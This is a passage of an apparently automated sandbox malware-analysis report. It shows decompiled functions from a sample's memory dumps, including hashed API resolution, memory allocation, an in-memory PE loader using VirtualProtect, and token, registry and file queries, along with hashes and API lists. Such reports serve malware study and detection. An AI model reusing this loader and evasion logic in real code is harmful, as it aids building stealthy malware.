Opcode Fuzzy Hash: 7963b640091bc386514f1adee717f431b6f66ac1aa5899139ec8c23f3c331b42
Instruction Fuzzy Hash: 6422C270608344AEE721DB28C851B9F77BBEF99310F10CA5DB5A69B391DB30E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 708D218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E708D218C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E708D3A34(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E708D2F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x708d218c
0x708d2190
0x708d21ac
0x708d21af
0x708d2192
0x708d21a1
0x708d21a4
0x708d21a4
0x708d21bf
0x708d21c4
0x708d21c8
0x708d21d0
0x708d21d0
0x708d21d4

APIs

NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,708C35C3,00000000,00000000,?), ref: 708D21D0

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction ID: b440e04d90e6d48a7beb3a18f22078e7a207fb6aa7f19d47c7e2db4bb70fad36
Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction Fuzzy Hash: 93E09BB020E3116DEF449729CD01B2F7AEEDF98211F20CB2CB595D63C4EA30E8014722

Uniqueness

Uniqueness Score: -1.00%

Function 708D2790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E708D2790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E708D2F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x708d2797
0x708d27a0
0x708d27ae
0x708d27d1
0x708d27d1
0x708d27b0
0x708d27c7
0x708d27cb
0x00000000
0x708d27cd
0x708d27cd
0x708d27cd
0x708d27cb
0x708d27d6

APIs

NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,708D8852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 708D27C7

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction ID: 408e066570abfa0a6b7a136c0bcaacf2754bc5981afc8cd019950d60c8ddd064
Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction Fuzzy Hash: 77E0307120D342EFDB19CA24CC15E6FB7EEEF98200F108E1DB495C6650DB70D8409722

Uniqueness

Uniqueness Score: -1.00%

Function 708D3060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E708D3060(intOrPtr* __ecx) {
				void* _t1;

				_push(E708D33D8);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x708d3060
0x708d3065
0x708d3067
0x708d3069

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,708D33D8,708D3050,A5EABDF8,A5EABDF8,?,708C2530,00000001), ref: 708D3067

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 9f7af51607a473d76efdeb69ef7febce015b03f7bc9e969ddfb854d257583120
Instruction ID: c986229285ce2aa1ade75bd154c0ea1ecf6b8252413955b5732b3057ec4d2a72
Opcode Fuzzy Hash: 9f7af51607a473d76efdeb69ef7febce015b03f7bc9e969ddfb854d257583120
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 02DF23FD, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 230
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02DF23FD(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void* _v124;
				char* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				int _v168;
				intOrPtr _v172;
				char* _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				char _v188;
				intOrPtr* _t140;
				int _t146;
				int _t154;
				int _t158;
				intOrPtr _t173;
				int _t185;
				unsigned int _t201;
				void* _t235;
				intOrPtr _t238;
				intOrPtr _t243;
				void* _t245;
				intOrPtr* _t249;
				intOrPtr _t256;
				DWORD* _t270;
				void* _t274;
				intOrPtr* _t277;
				intOrPtr* _t278;

				_t140 = _a4;
				_v20 = 0;
				_t245 =  *((intOrPtr*)(_t140 + 8));
				 *0x2df4418 = 1;
				asm("movaps xmm0, [0x2df3010]");
				asm("movups [0x2df4428], xmm0");
				_v48 = _t140;
				_v52 =  *((intOrPtr*)(_t140 + 0x40));
				_v56 =  *((intOrPtr*)(_v48 + 0x60));
				_v188 = _t245;
				_v184 =  *((intOrPtr*)(_t140 + 0x54));
				_v180 = 4;
				_v176 =  &_v20;
				_v60 =  *((intOrPtr*)(_v48 + 0x58));
				_v64 = 4;
				_v68 = _t245;
				_v72 =  &_v20;
				_t146 = VirtualProtect(__esi, __edi, __ebx, _t270); // executed
				_v76 = _t146;
				_v188 = _v68;
				_v184 = 0;
				_v180 =  *((intOrPtr*)(_v48 + 0x54));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E02DF2077();
				E02DF1000(_v68,  *((intOrPtr*)(_v48 + 0x50)), _v56);
				E02DF2077( *((intOrPtr*)(_v48 + 0x50)), 0, _v56);
				_t154 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t277 = _t274 - 0x8c;
				_t235 = _v68;
				_t256 =  *((intOrPtr*)(_t235 + 0x3c));
				_v96 = _t154;
				_v100 = _v68 + 0x3c;
				_v104 = _t235;
				_v108 = _t256;
				if(_t256 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v172 = _v104;
				if(_v60 != 0) {
					_v148 = 0;
					_v144 = _v172 + 0x18 + ( *(_v172 + 0x14) & 0x0000ffff);
					while(1) {
						_t173 = _v144;
						_t201 =  *(_t173 + 0x24);
						_v152 = _t173;
						_v156 = _t201 >> 0x0000001e & 0x00000001;
						_v160 = _t201 >> 0x1f;
						_v188 = _v68 +  *((intOrPtr*)(_v152 + 0xc));
						_v184 =  *((intOrPtr*)(_t173 + 8));
						_v180 =  *((intOrPtr*)(0x2df4418 + (_v156 << 4) + (_v160 << 3) + ((_t201 >> 0x0000001d & 0x00000001) << 2)));
						_v176 =  &_v20;
						_v164 = _v148;
						_t185 = VirtualProtect(??, ??, ??, ??); // executed
						_t277 = _t277 - 0x10;
						_t243 = _v164 + 1;
						_v168 = _t185;
						_v148 = _t243;
						_v144 = _v152 + 0x28;
						if(_t243 == _v60) {
							goto L2;
						}
					}
				}
				L2:
				 *_t277 = _v68;
				_v112 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t158 = DisableThreadLibraryCalls(??);
				_t278 = _t277 - 4;
				_t238 =  *_v100;
				_v116 = _t158;
				_v120 = _t238;
				_v124 = _v68;
				if(_t238 != 0) {
					_v124 = _v68 + (_v120 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t249 = _v48;
				_v44 =  *((intOrPtr*)(_t249 + 0x20));
				_v40 =  *((intOrPtr*)(_t249 + 0x38));
				_v36 =  *_t249;
				_v32 =  *((intOrPtr*)(_t249 + 0x4c));
				_v28 =  *((intOrPtr*)(_t249 + 0x24));
				_v24 = _v112;
				 *_t278 = _t249;
				_v188 = 0;
				_v184 = 0x64;
				_v128 =  &_v44;
				_v132 = 0;
				_v136 = 0x64;
				_v140 =  *((intOrPtr*)(_v124 + 0x28));
				E02DF2077();
				if(_v140 != 0) {
					_t277 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x02df2409
0x02df2417
0x02df241e
0x02df2421
0x02df242b
0x02df2432
0x02df243c
0x02df2442
0x02df244b
0x02df2454
0x02df2457
0x02df245b
0x02df2463
0x02df246a
0x02df246d
0x02df2470
0x02df2473
0x02df2476
0x02df2490
0x02df2496
0x02df2499
0x02df24a1
0x02df24a5
0x02df24a8
0x02df24ab
0x02df24ae
0x02df24b1
0x02df24cd
0x02df24ea
0x02df250f
0x02df2511
0x02df251a
0x02df251d
0x02df2527
0x02df252a
0x02df252d
0x02df2530
0x02df2533
0x02df261d
0x02df261d
0x02df274e
0x02df2754
0x02df26f6
0x02df26fc
0x02df2625
0x02df2625
0x02df263d
0x02df2640
0x02df264e
0x02df265f
0x02df268e
0x02df2691
0x02df2695
0x02df2699
0x02df26a0
0x02df26a6
0x02df26a8
0x02df26ba
0x02df26c2
0x02df26c8
0x02df26ce
0x02df26d4
0x00000000
0x00000000
0x02df26da
0x02df2625
0x02df253e
0x02df254c
0x02df2554
0x02df2557
0x02df2559
0x02df255f
0x02df256b
0x02df256e
0x02df2571
0x02df2574
0x02df271c
0x02df271c
0x02df258a
0x02df2590
0x02df2596
0x02df259b
0x02df25a1
0x02df25a7
0x02df25ad
0x02df25b0
0x02df25b3
0x02df25bb
0x02df25c3
0x02df25c6
0x02df25c9
0x02df25cf
0x02df25d5
0x02df25e3
0x02df2732
0x02df2738
0x02df2738
0x02df2602

APIs

VirtualProtect.KERNELBASE ref: 02DF2476
VirtualProtect.KERNELBASE ref: 02DF250F
VirtualProtect.KERNELBASE ref: 02DF26A6

Strings

d, xrefs: 02DF25BB

Memory Dump Source

Source File: 00000002.00000002.494062433.0000000002DF0000.00000040.00000001.sdmp, Offset: 02DF0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: d
API String ID: 544645111-2564639436
Opcode ID: 8ce36f9a8ba7f4ee2309e8a84ed300e301bfaee87abe41587b5eed6fa998a2fc
Instruction ID: 62f0ab2dd4e26aae6477692d35ebfac81f41f537392a88addd2bc672f5fa121b
Opcode Fuzzy Hash: 8ce36f9a8ba7f4ee2309e8a84ed300e301bfaee87abe41587b5eed6fa998a2fc
Instruction Fuzzy Hash: 92B19CB5E002188FDB54CF58C880A9DBBF1FF88304F1685AAD948AB351D730AD85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 708D1140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E708D1140(void* __ecx, void* __edi, void* __esi) {
				long _v12;
				void* _v20;
				void* _v24;
				char _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v64;
				int _t31;
				void* _t33;
				long* _t39;
				intOrPtr* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				long* _t59;

				_t59 = _t58 - 0x20;
				_t56 = __ecx;
				_v12 = 0;
				_t46 = E708D2F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t46 != 0) {
					 *_t46(_t56, 8,  &_v12);
				}
				_t39 = _t59;
				 *_t39 = _v12;
				_t39[1] = 1;
				if(E708CC33C(_t39) != 0) {
					L6:
					if(_t59[1] != 0) {
						E708CBC00(_t59);
					}
					return 0;
				} else {
					_t59[6] = 0;
					if(E708D2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
					}
					_t24 = _t59[6];
					if(_t59[6] != 0) {
						E708CF620( &_v32, _t24);
						_t54 = E708CF558( &(_t59[3]), 0);
						if(E708D2F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
							L14:
							E708CF6F0( &_v32);
							goto L6;
						} else {
							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
							if(_t31 == 0) {
								goto L14;
							} else {
								_t33 = E708D2F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
								if(_t33 == 0) {
									goto L14;
								} else {
									_push( *_t54);
									asm("int3");
									return _t33;
								}
							}
						}
					} else {
						goto L6;
					}
				}
			}

0x708d1142
0x708d114f
0x708d1151
0x708d1160
0x708d1164
0x708d116e
0x708d116e
0x708d1174
0x708d1177
0x708d1179
0x708d1184
0x708d11be
0x708d11c3
0x708d11c8
0x708d11c8
0x708d11d4
0x708d1186
0x708d1190
0x708d11a3
0x708d11b4
0x708d11b4
0x708d11b6
0x708d11bc
0x708d11da
0x708d11ea
0x708d1201
0x708d12e3
0x708d12e7
0x00000000
0x708d1207
0x708d1217
0x708d121b
0x00000000
0x708d1221
0x708d122d
0x708d1234
0x00000000
0x708d123a
0x708d123a
0x708d123c
0x708d123d
0x708d123d
0x708d1234
0x708d121b
0x00000000
0x00000000
0x00000000
0x708d11bc

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 708D11B4
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 708D1217

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 7233e0464975bed0b387e02181c5ba269ca55134ac212cebc4faec61c86edccf
Instruction ID: c7ec1f80c247c51e480ee7ae2cc8bc6cb887344b53dbfe7250558f4d9cc1d2f3
Opcode Fuzzy Hash: 7233e0464975bed0b387e02181c5ba269ca55134ac212cebc4faec61c86edccf
Instruction Fuzzy Hash: 682188706082067EEB05DA68C811FAF76BEEFD9200F10CA2CB545C6391EF75D8098762

Uniqueness

Uniqueness Score: -1.00%

Function 708D5720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E708D5720(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E708D2F8C(0xd0443458, 0x91134e46) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E708CF8C4(_a8, _t15);
							if(E708D2F8C(0xd0443458, 0x91134e46) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E708CF558(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x708d5724
0x708d5725
0x708d5727
0x708d572c
0x708d5733
0x708d5737
0x708d5737
0x708d5737
0x708d573b
0x708d5781
0x708d5781
0x708d573d
0x708d573d
0x708d5743
0x708d574c
0x708d574f
0x708d5766
0x708d5777
0x708d5777
0x708d5779
0x708d577f
0x708d578a
0x708d57a2
0x708d57c2
0x708d57c2
0x708d57c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x708d5743
0x708d57cc

APIs

RegQueryValueExA.KERNELBASE(?,708DD1F8,00000000,?,00000000,00000000,?,?,?,708DD1F8,?,708D57F3,?,00000000,00000000), ref: 708D5777
RegQueryValueExA.KERNELBASE(?,708DD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,708DD1F8,?,708D57F3,?,00000000), ref: 708D57C2

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7d0dcf7e8ff1ed4daad01622fcf704d64fcd41feb03c036122353a5e5619fea0
Instruction ID: 471156894c6a0202ed5f79070a8191815fd8ea66a2f0cf506de138ffd0fb0bc8
Opcode Fuzzy Hash: 7d0dcf7e8ff1ed4daad01622fcf704d64fcd41feb03c036122353a5e5619fea0
Instruction Fuzzy Hash: 2911D371209309FFE611DE29DC91F6FBBEEDF89664F208B1EB58597240DA20EC009671

Uniqueness

Uniqueness Score: -1.00%

Function 708D5AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E708D5AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t29;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t56;
				WCHAR** _t58;
				char* _t64;
				void* _t65;
				long _t66;

				_push(0);
				_push(_t62);
				_t66 = _t65 - 0x10;
				_t58 = __ecx;
				_t37 = _a8;
				if(E708CD288(__ecx, 0x2f) != 0) {
					_t62 = _t66;
					E708CD78C(__ecx, _t66);
					E708CD0B4(_t58,  *_t66);
					E708CD098(_t66);
				}
				if(_t37 == 0) {
					_t70 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E708D621C(_t70);
				if(_a4 <= 5) {
					goto __eax;
				}
				_t62 = 0;
				if(_t37 != 2) {
					_t16 = 3;
					__eflags = _t37 - 1;
					_t38 = 0;
					_t39 =  ==  ? _t16 : _t38;
				} else {
					_t39 = 1;
				}
				if(E708D2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
					_push(_t29);
				}
				_t40 =  &(_t58[3]);
				E708CC328(_t40);
				if(E708CC33C(_t40) != 0) {
					_t58[2] = E708D352C(0);
					_t21 = 0;
					goto L19;
				} else {
					if(_a4 == 2) {
						_t56 = E708D2F8C(0x4bcc7cba, 0xceed09cc);
						__eflags = _t56;
						if(_t56 != 0) {
							 *_t56( *_t40, 0, 0, 2);
						}
					}
					_t64 =  &_v24;
					E708D35D4(_t64, 0xff, 8);
					_t66 = _t66 + 0xc;
					_t24 = E708D2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t24 == 0) {
						_t21 = 1;
						__eflags = 1;
						L19:
						return _t21;
					} else {
						_push(_t64);
						_push(_t64);
						_push(0);
						_push( *_t40);
						asm("int3");
						return _t24;
					}
				}
			}

0x708d5aa8
0x708d5aab
0x708d5aac
0x708d5aaf
0x708d5ab1
0x708d5abe
0x708d5ac2
0x708d5ac6
0x708d5ad0
0x708d5ad7
0x708d5ad7
0x708d5ade
0x708d5ae0
0x708d5ae5
0x708d5aee
0x708d5af6
0x708d5af6
0x708d5ae7
0x708d5ae9
0x708d5ae9
0x708d5ae5
0x708d5afb
0x708d5b07
0x708d5b1d
0x708d5b1d
0x708d5c38
0x708d5b75
0x708d5b7e
0x708d5b7f
0x708d5b84
0x708d5b85
0x708d5b77
0x708d5b79
0x708d5b79
0x708d5b9b
0x708d5baf
0x708d5b9d
0x708d5baa
0x708d5bac
0x708d5bac
0x708d5bb1
0x708d5bb6
0x708d5bc4
0x708d5c2f
0x708d5c32
0x00000000
0x708d5bc6
0x708d5bcb
0x708d5c18
0x708d5c1a
0x708d5c1c
0x708d5c26
0x708d5c26
0x708d5c1c
0x708d5bcd
0x708d5bd9
0x708d5bde
0x708d5beb
0x708d5bf2
0x708d5bfe
0x708d5bfe
0x708d5bff
0x708d5c06
0x708d5bf4
0x708d5bf4
0x708d5bf5
0x708d5bf6
0x708d5bf8
0x708d5bfa
0x708d5bfb
0x708d5bfb
0x708d5bf2

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bdbce349a07efc75eb51a7e7126e73cb3a37b56527202ee313c949f2f8c803c
Instruction ID: 0094836e0051498cb0ac2b1e3828748323747d9e3786fd7ce921d2e71912af60
Opcode Fuzzy Hash: 8bdbce349a07efc75eb51a7e7126e73cb3a37b56527202ee313c949f2f8c803c
Instruction Fuzzy Hash: E431F77134431ABED7112A798C82F3F76BFEB89214F108B6FF94296381DF61D9048221

Uniqueness

Uniqueness Score: -1.00%

Function 708D5B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E708D5B51(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E708D2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E708CC328(_t24);
					if(E708CC33C(_t24) != 0) {
						_t33[2] = E708D352C(0x80000000);
						_t12 = 0;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E708D2F8C(0x4bcc7cba, 0xceed09cc);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E708D35D4(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						_t15 = E708D2F8C(0x4bcc7cba, 0xaaa9bb);
						if(_t15 == 0) {
							_t12 = 1;
							goto L14;
						} else {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							return _t15;
						}
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
					L14:
					return _t12;
				}
			}

0x708d5b51
0x708d5b53
0x708d5b6a
0x708d5b75
0x708d5b7e
0x708d5b84
0x708d5b85
0x708d5b77
0x708d5b79
0x708d5b79
0x708d5b9b
0x708d5baf
0x708d5b9d
0x708d5baa
0x708d5bac
0x708d5bac
0x708d5bb1
0x708d5bb6
0x708d5bc4
0x708d5c2f
0x708d5c32
0x00000000
0x708d5bc6
0x708d5bcb
0x708d5c18
0x708d5c1c
0x708d5c26
0x708d5c26
0x708d5c1c
0x708d5bcd
0x708d5bd9
0x708d5bde
0x708d5beb
0x708d5bf2
0x708d5bfe
0x00000000
0x708d5bf4
0x708d5bf4
0x708d5bf5
0x708d5bf6
0x708d5bf8
0x708d5bfa
0x708d5bfb
0x708d5bfb
0x708d5bf2
0x708d5b55
0x708d5b55
0x708d5b5c
0x708d5bff
0x708d5c06
0x708d5c06

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 708D5BAA

Memory Dump Source

Source File: 00000002.00000002.495045703.00000000708C1000.00000020.00020000.sdmp, Offset: 708C0000, based on PE: true

Associated: 00000002.00000002.495038450.00000000708C0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495074114.00000000708DA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.495086172.00000000708DD000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.495093344.00000000708DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction ID: 750eac276abcdcc5bf822e732d446cef42529d369b460d38d6e0db54cdfe8d33
Opcode Fuzzy Hash: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction Fuzzy Hash: B201F935380306BEE71116259C83F3FB76FDB99160F108B6BF94256285DF5298148171

Uniqueness

Uniqueness Score: -1.00%

Function 708D5B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E708D5B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E708D2F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E708CC328(_t24);
				if(E708CC33C(_t24) != 0) {
					_t34[2] = E708D352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E708D2F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E708D35D4(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					_t15 = E708D2F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t41);
